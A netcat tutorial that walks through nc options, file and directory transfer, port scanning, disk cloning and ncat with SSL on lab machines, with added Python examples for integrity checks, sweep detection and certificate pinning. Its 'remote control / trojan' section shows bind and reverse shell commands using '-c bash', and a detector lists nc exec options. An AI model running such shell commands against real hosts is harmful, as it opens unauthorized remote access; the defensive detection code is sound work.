NETCAT (nc) Usage

NETCAT: nc

nc is a command-line tool commonly used on Kali and is known as the "Swiss Army knife" of network tools. Besides the Linux version there is also a Windows version, so it is a cross-platform utility. I first came across nc in CTF competitions, where it is used to connect to the challenge server to solve a task; only later did I learn that nc can do far more than that, so I wrote this article to record it.
See the Baidu Baike entry for an introduction to NETCAT.

Common uses of nc

Common nc options

root@kali:~# nc -h
[v1.10-41]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

The meaning of the options used in this article is as follows:

Option   Meaning
-i       Set the delay interval between transmitted packets
-l       Run in server (listen) mode
-k       Keep accepting and handling every connection on the port; must be used together with -l
-n       Refer to hosts by IP address rather than hostname, and to ports by number rather than service name
-p       When nc runs as a client, force it to use the given local port number
-s       Set the source IP address of packets sent from the local host
-C       Use the two characters CR and LF as the line terminator
-U       Use UNIX domain sockets
-u       Use UDP instead of the default TCP
-w       Exit if the nc client detects no input within the given time
-X       When the nc client talks to a proxy server, select the protocol used between them
-x       Specify the IP address and port of the proxy server
-z       Check whether one or more services on the target machine are open (port scan)

Note that this table follows the OpenBSD netcat option set (-k, -U, -X and -x exist only there), which differs from the traditional netcat whose `nc -h` output is shown above; in that version -k sets the socket keepalive option instead of keeping the listener open.

telnet / banner grabbing

root@kali:~# ping pop.qq.com
PING pop.qq.com (59.37.97.57) 56(84) bytes of data.
64 bytes from 59.37.97.57: icmp_seq=1 ttl=53 time=23.1 ms
64 bytes from 59.37.97.57: icmp_seq=2 ttl=53 time=23.3 ms
^Z
[8]+ Stopped ping pop.qq.com
root@kali:~# nc -nv 59.37.97.57 995
(UNKNOWN) [59.37.97.57] 995 (pop3s) open
^Z
[9]+ Stopped nc -nv 59.37.97.57 995
root@kali:~#

Here we use nc to connect to the POP3S service of QQ Mail; as shown, the connection succeeds.

Transferring text

Server side (192.168.0.104)

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.104 netmask 255.255.255.0 broadcast 192.168.0.255

root@kali:~# nc -l -p 8888
我是105
我是104

Client side (192.168.0.105)

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.105 netmask 255.255.255.0 broadcast

root@kali:~# nc -nv 192.168.0.104 8888
(UNKNOWN) [192.168.0.104] 8888 (?) open
我是105
我是104

Transferring files/directories

Transferring a file

Server side (192.168.0.104)

root@kali:~/Desktop# ls
test.txt
root@kali:~/Desktop# nc -l -p 8888 >testfrom105.txt
root@kali:~/Desktop# ls
testfrom105.txt test.txt
root@kali:~/Desktop# cat testfrom105.txt
i come from 105

Client side (192.168.0.105)

root@kali:~# ls
Desktop Documents Downloads Music Pictures Public Templates test.txt Videos
root@kali:~# nc -nv 192.168.0.104 8888 < test.txt -q 1
(UNKNOWN) [192.168.0.104] 8888 (?) open

Transferring a directory

Server side (192.168.0.105)

root@kali:~# mkdir testin105
root@kali:~# cd testin105/
root@kali:~/testin105# touch test1.txt
root@kali:~/testin105# vi test1.txt
root@kali:~/testin105# cat test1.txt
come fron 105
root@kali:~/testin105# cd ..
root@kali:~# ls
Desktop Downloads Pictures Templates test.txt
Documents Music Public testin105 Videos
root@kali:~# tar -cvf - testin105/ | nc -lp 8888 -q 1
testin105/
testin105/test1.txt
root@kali:~#

Client side (192.168.0.104)

root@kali:~/Desktop# ls
testfrom105.txt test.txt
root@kali:~/Desktop# nc -nv 192.168.0.105 8888 | tar -xvf -
(UNKNOWN) [192.168.0.105] 8888 (?) open
testin105/
testin105/test1.txt
root@kali:~/Desktop# ls
testfrom105.txt testin105 test.txt
root@kali:~/Desktop# cd testin105/
root@kali:~/Desktop/testin105# cat test1.txt
come fron 105

Encrypted file transfer

Sender

mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 192.168.0.104 8888 -q 1

Receiver

nc -lp 8888 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
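The text and file transfers above, as well as the mcrypt pipeline, rely on the peer closing the connection to signal end of data and give no way to tell whether the bytes arrived intact: nc itself has no integrity check, and ECB mode (the `-m ecb` passed to mcrypt) does not add one either, since it encrypts each block independently and a modified ciphertext simply decrypts to garbage without being detected. The following Python script is an added example, not code from the original post: it reproduces the `nc -l -p PORT > file` / `nc host PORT < file` pattern on the loopback interface inside one process and appends an HMAC-SHA256 tag that the receiving side verifies before trusting the data. The shared key, the port (chosen by the OS here rather than 8888) and the file contents are constructed for the demonstration.

```python
import hashlib
import hmac
import socket
import threading

# Added example (not from the original post): reproduces the nc file-transfer
# pattern on the loopback interface and adds an integrity check. The key and
# file contents used at the bottom are constructed for the demonstration.
TAG_LEN = 32  # HMAC-SHA256 produces a 32-byte tag


def listener(ready, result, port_box):
    """Emulates `nc -l -p PORT > file`: accept one connection, read until EOF."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    port_box.append(srv.getsockname()[1])
    ready.set()
    conn, _ = srv.accept()
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:                    # peer closed its side, as `nc -q 1` does after stdin EOF
            break
        chunks.append(data)
    conn.close()
    srv.close()
    result.append(b"".join(chunks))


def send_file(port, payload, key):
    """Emulates `nc host PORT < file -q 1`, with an HMAC-SHA256 tag appended."""
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    with socket.create_connection(("127.0.0.1", port)) as c:
        c.sendall(payload + tag)
        c.shutdown(socket.SHUT_WR)      # signal EOF to the listener


def verify_stream(stream, key):
    """Split the received stream into payload and tag; return (tag_ok, payload)."""
    if len(stream) < TAG_LEN:
        return False, b""
    payload, tag = stream[:-TAG_LEN], stream[-TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    return hmac.compare_digest(tag, expected), payload


def transfer(payload, send_key, recv_key):
    """Run both ends on loopback; returns (tag_ok, received_payload)."""
    ready = threading.Event()
    result, port_box = [], []
    t = threading.Thread(target=listener, args=(ready, result, port_box))
    t.start()
    ready.wait()                        # wait until the listener knows its port
    send_file(port_box[0], payload, send_key)
    t.join()
    return verify_stream(result[0], recv_key)


if __name__ == "__main__":
    key = b"constructed-shared-key"
    ok, data = transfer(b"i come from 105\n", key, key)
    print(ok, data)                     # True b'i come from 105\n'
    ok, _ = transfer(b"i come from 105\n", key, b"wrong-key")
    print(ok)                           # False: tag does not verify
```

The receiving side treats the last 32 bytes of the stream as the tag, so a truncated or altered stream fails verification rather than silently producing a corrupt file; in the mcrypt pipeline above, the same check would be applied to the ciphertext before decryption.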

Port scanning

root@kali:~/Desktop# nc -nvz 192.168.0.105 1-65535
(UNKNOWN) [192.168.0.105] 8888 (?) open
(UNKNOWN) [192.168.0.105] 22 (ssh) open

root@kali:~/Desktop# nc -vnvz 192.168.0.105 20-25
(UNKNOWN) [192.168.0.105] 25 (smtp) : Connection refused
(UNKNOWN) [192.168.0.105] 24 (?) : Connection refused
(UNKNOWN) [192.168.0.105] 23 (telnet) : Connection refused
(UNKNOWN) [192.168.0.105] 22 (ssh) open
(UNKNOWN) [192.168.0.105] 21 (ftp) : Connection refused
(UNKNOWN) [192.168.0.105] 20 (ftp-data) : Connection refused
sent 0, rcvd 0
root@kali:~/Desktop#

Here the 192.168.0.104 virtual machine is used to scan 192.168.0.105 for open ports.
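From the scanned host's point of view, a sweep such as `nc -nvz 192.168.0.105 1-65535` is one source attempting a TCP connection to a large number of distinct ports within a short time, which is easy to pick out of firewall logs. The following Python script is an added example (not from the original post) that does this over constructed iptables-style log lines; the line format, the window length and the port threshold are assumptions made for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Added example (not from the original post). Flags sources that touch many
# distinct ports on one host within a short window, which is what a sweep
# such as `nc -nvz host 1-65535` looks like from the target's side.
# The log lines below are constructed in an iptables-style format.
LOG = """\
Jan 10 10:00:01 host kernel: IN=eth0 SRC=192.168.0.104 DST=192.168.0.105 PROTO=TCP SPT=40001 DPT=20 SYN
Jan 10 10:00:01 host kernel: IN=eth0 SRC=192.168.0.104 DST=192.168.0.105 PROTO=TCP SPT=40002 DPT=21 SYN
Jan 10 10:00:01 host kernel: IN=eth0 SRC=192.168.0.104 DST=192.168.0.105 PROTO=TCP SPT=40003 DPT=22 SYN
Jan 10 10:00:02 host kernel: IN=eth0 SRC=192.168.0.104 DST=192.168.0.105 PROTO=TCP SPT=40004 DPT=23 SYN
Jan 10 10:00:02 host kernel: IN=eth0 SRC=192.168.0.104 DST=192.168.0.105 PROTO=TCP SPT=40005 DPT=24 SYN
Jan 10 10:00:02 host kernel: IN=eth0 SRC=192.168.0.104 DST=192.168.0.105 PROTO=TCP SPT=40006 DPT=25 SYN
Jan 10 10:00:30 host kernel: IN=eth0 SRC=192.168.0.50 DST=192.168.0.105 PROTO=TCP SPT=51000 DPT=22 SYN
Jan 10 10:05:00 host kernel: IN=eth0 SRC=192.168.0.50 DST=192.168.0.105 PROTO=TCP SPT=51001 DPT=22 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)"
)


def parse(lines, year=2024):
    """Yield (timestamp, source_ip, destination_port) for every line that matches."""
    for line in lines.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["src"], int(m["dpt"])


def detect_sweeps(lines, min_ports=5, window=timedelta(seconds=10)):
    """Return {source_ip: sorted distinct ports} for sources that hit at least
    min_ports distinct destination ports within any sliding window of the
    given length; the largest such port set per source is reported."""
    events = defaultdict(list)
    for ts, src, port in parse(lines):
        events[src].append((ts, port))
    hits = {}
    for src, evs in events.items():
        evs.sort()
        best = set()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window forward
                start += 1
            ports = {p for _, p in evs[start:end + 1]}
            if len(ports) >= min_ports and len(ports) > len(best):
                best = ports
        if best:
            hits[src] = sorted(best)
    return hits


if __name__ == "__main__":
    print(detect_sweeps(LOG))   # {'192.168.0.104': [20, 21, 22, 23, 24, 25]}
```

The second source in the constructed log (192.168.0.50) connects to the same port twice, minutes apart, and is correctly not reported: the rule counts distinct destination ports, not connection attempts, so ordinary repeated SSH logins do not trigger it.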

Remote control / trojan

Forward (bind: the server provides the shell)

Server side (192.168.0.104)

root@kali:~/Desktop# nc -lp 8888 -c bash

Client side (192.168.0.105)

root@kali:~# nc 192.168.0.104 8888
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.104 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::a00:27ff:fee2:3544 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:e2:35:44 txqueuelen 1000 (Ethernet)
RX packets 179887 bytes 12207744 (11.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 216384 bytes 22147179 (21.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Reverse (the client provides a shell to the server)

Server side (192.168.0.104)

root@kali:~/Desktop# nc -lp 8888
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.105 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::a00:27ff:fe7e:89b8 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:7e:89:b8 txqueuelen 1000 (Ethernet)
RX packets 182183 bytes 13976858 (13.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 220592 bytes 20972545 (20.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Client side (192.168.0.105)

root@kali:~# nc 192.168.0.104 8888 -c bash
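The `nc -h` output earlier marks -c and -e as "[dangerous!!]" for good reason: both the bind and reverse variants above amount to netcat handing a shell to whoever is on the other end of the socket, so on hosts you administer the invocation itself is worth alerting on. The following Python script is an added example (not from the original post) that checks process command lines for nc or ncat started with an option that attaches a program to the connection. The event format is constructed; -e and -c come from the help text above, while --exec and --sh-exec are ncat's equivalents.

```python
import re
import shlex

# Added example (not from the original post). Inspects process command lines
# (e.g. from auditd execve records or an EDR feed) for netcat/ncat invoked
# with an option that attaches a program to the connection, which is what
# both the bind (`nc -lp 8888 -c bash`) and reverse (`nc host 8888 -c bash`)
# examples above do. The event lines below are constructed.
EVENTS = [
    "uid=0 pid=4021 comm=nc exe=/bin/nc.traditional cmd='nc -lp 8888 -c bash'",
    "uid=1000 pid=4022 comm=nc exe=/bin/nc.traditional cmd='nc 192.168.0.104 8888 -c bash'",
    "uid=1000 pid=4023 comm=nc exe=/bin/nc.traditional cmd='nc -nv 192.168.0.104 8888'",
    "uid=1000 pid=4024 comm=nc exe=/bin/nc.traditional cmd='nc -l -p 8888'",
    "uid=0 pid=4025 comm=ncat exe=/usr/bin/ncat cmd='ncat -c bash --allow 192.168.0.105 -nvl 8888 --ssl'",
    "uid=1000 pid=4026 comm=ncat exe=/usr/bin/ncat cmd='ncat --exec /bin/sh 192.168.0.104 8888'",
    "uid=1000 pid=4027 comm=ncat exe=/usr/bin/ncat cmd='ncat -nv 192.168.0.104 8888 --ssl'",
]

NC_BINARIES = {"nc", "ncat", "nc.traditional", "nc.openbsd", "netcat"}
# -e/-c: traditional nc (see `nc -h` above); --exec/--sh-exec: ncat's long forms
EXEC_OPTS = {"-e", "-c", "--exec", "--sh-exec"}
CMD_RE = re.compile(r"cmd='(?P<cmd>[^']*)'")


def exec_option_used(cmdline):
    """Return the program nc/ncat was told to run, or None if no exec option is present."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NC_BINARIES:
        return None
    for i, arg in enumerate(argv):
        if arg in EXEC_OPTS and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--exec=") or arg.startswith("--sh-exec="):
            return arg.split("=", 1)[1]
        # traditional nc accepts clustered short flags, e.g. `-lc bash`
        if arg.startswith("-") and not arg.startswith("--") and len(arg) > 2:
            if arg[-1] in ("e", "c") and i + 1 < len(argv):
                return argv[i + 1]
    return None


def flag_events(events):
    """Return [(pid, uid, program)] for events where nc/ncat attaches a program."""
    hits = []
    for ev in events:
        m = CMD_RE.search(ev)
        if not m:
            continue
        prog = exec_option_used(m["cmd"])
        if prog is not None:
            pid = int(re.search(r"pid=(\d+)", ev)[1])
            uid = int(re.search(r"uid=(\d+)", ev)[1])
            hits.append((pid, uid, prog))
    return hits


if __name__ == "__main__":
    for pid, uid, prog in flag_events(EVENTS):
        print(f"pid={pid} uid={uid}: netcat attached program {prog!r} to a socket")
```

Plain listeners and plain client connections (events 4023, 4024 and 4027 in the constructed data) are not flagged, only the four invocations that attach a shell; the check is deliberately independent of whether the socket is the listening or the connecting side, since the bind and reverse cases differ only in that respect.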

Streaming media server

Server

cat 1.mp4 | nc -lp 8888

Client

nc -nv 192.168.0.104 8888 | mplayer -vo x11 -cache 3000 -

Remote disk cloning

Receiver

root@kali:~/Desktop# nc -lp 8888 | dd of=/dev/sda

Sender

root@kali:~/Desktop# dd if=/dev/sda | nc -nv 192.168.0.104 8888 -q 1

Shortcomings of nc and a remedy

Shortcomings

nc has no authentication or encryption capability, so using it on the public Internet is very insecure.

Remedy

Use the ncat tool from the nmap package.
Server side

root@kali:~/Desktop# ncat -c bash --allow 192.168.0.105 -nvl 8888 --ssl
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 4C17 4716 20A5 422C 6065 6B7D 4232 9A3C 59D8 38E1
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 192.168.0.105.
Ncat: Connection from 192.168.0.105:49614.

Client

root@kali:~# ncat -nv 192.168.0.104 8888 --ssl
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: 4C17 4716 20A5 422C 6065 6B7D 4232 9A3C 59D8 38E1
Ncat: Certificate verification failed (self signed certificate).
Ncat: SSL connection to 192.168.0.104:8888.
Ncat: SHA-1 fingerprint: 4C17 4716 20A5 422C 6065 6B7D 4232 9A3C 59D8 38E1
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.104 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::a00:27ff:fee2:3544 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:e2:35:44 txqueuelen 1000 (Ethernet)
RX packets 211628 bytes 14499858 (13.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 267090 bytes 28840239 (27.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 0 (Local Loopback)
RX packets 28 bytes 1756 (1.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28 bytes 1756 (1.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
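The client output above shows what `--ssl` alone gives you: the traffic is encrypted, but the certificate is a temporary self-signed one and ncat reports "Certificate verification failed", so nothing stops a machine in the middle from presenting its own certificate. ncat prints the server certificate's SHA-1 fingerprint on both ends precisely so that the two can be compared out of band (ncat's --ssl-verify with --ssl-trustfile, or a permanent --ssl-cert/--ssl-key pair, is the fuller fix). The following Python client is an added example (not from the original post) that pins the fingerprint: it connects with TLS, reads the server certificate and refuses to continue unless the fingerprint matches the value copied from the server console. The host, port and pinned value in the usage block are placeholders taken from the transcript above.

```python
import hashlib
import socket
import ssl

# Added example (not from the original post). ncat --ssl without --ssl-verify
# encrypts the connection but does not authenticate the peer. What it does
# give you is the SHA-1 fingerprint printed on both ends; this client refuses
# to talk unless the fingerprint it sees matches one obtained out of band.
# The "XXXX XXXX ..." grouping below is the format ncat prints.


def format_fingerprint(digest):
    """Render a raw digest as groups of four upper-case hex digits, as ncat does."""
    hexstr = digest.hex().upper()
    return " ".join(hexstr[i:i + 4] for i in range(0, len(hexstr), 4))


def sha1_fingerprint(der_cert):
    """SHA-1 fingerprint of a DER-encoded certificate, in ncat's display format."""
    return format_fingerprint(hashlib.sha1(der_cert).digest())


def normalize(fp):
    """Accept fingerprints written with spaces, colons or lower-case hex."""
    return "".join(ch for ch in fp.upper() if ch in "0123456789ABCDEF")


def fingerprint_matches(der_cert, expected_fp):
    """True if the certificate's SHA-1 fingerprint equals the pinned value."""
    return normalize(sha1_fingerprint(der_cert)) == normalize(expected_fp)


def connect_pinned(host, port, expected_fp, timeout=5.0):
    """Open a TLS connection and return the socket only if the server
    certificate's SHA-1 fingerprint equals expected_fp; otherwise raise."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # self-signed: hostname checking cannot work
    ctx.verify_mode = ssl.CERT_NONE     # chain validation is replaced by the pin below
    raw = socket.create_connection((host, port), timeout=timeout)
    tls = ctx.wrap_socket(raw, server_hostname=host)
    der = tls.getpeercert(binary_form=True)
    if der is None or not fingerprint_matches(der, expected_fp):
        tls.close()
        raise ssl.SSLError("server certificate fingerprint does not match the pinned value")
    return tls


if __name__ == "__main__":
    # Placeholder values taken from the transcript above: the pinned fingerprint
    # is the "Ncat: SHA-1 fingerprint" line printed on the server console.
    pinned = "4C17 4716 20A5 422C 6065 6B7D 4232 9A3C 59D8 38E1"
    with connect_pinned("192.168.0.104", 8888, pinned) as tls:
        print("pinned fingerprint verified, connection established")
```

The comparison is done on the DER bytes of the certificate actually presented during the handshake, so a different certificate from an interposed host is rejected before any data is exchanged; with a permanent --ssl-cert/--ssl-key pair on the server the pinned value stays stable across restarts instead of changing with every temporary key.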
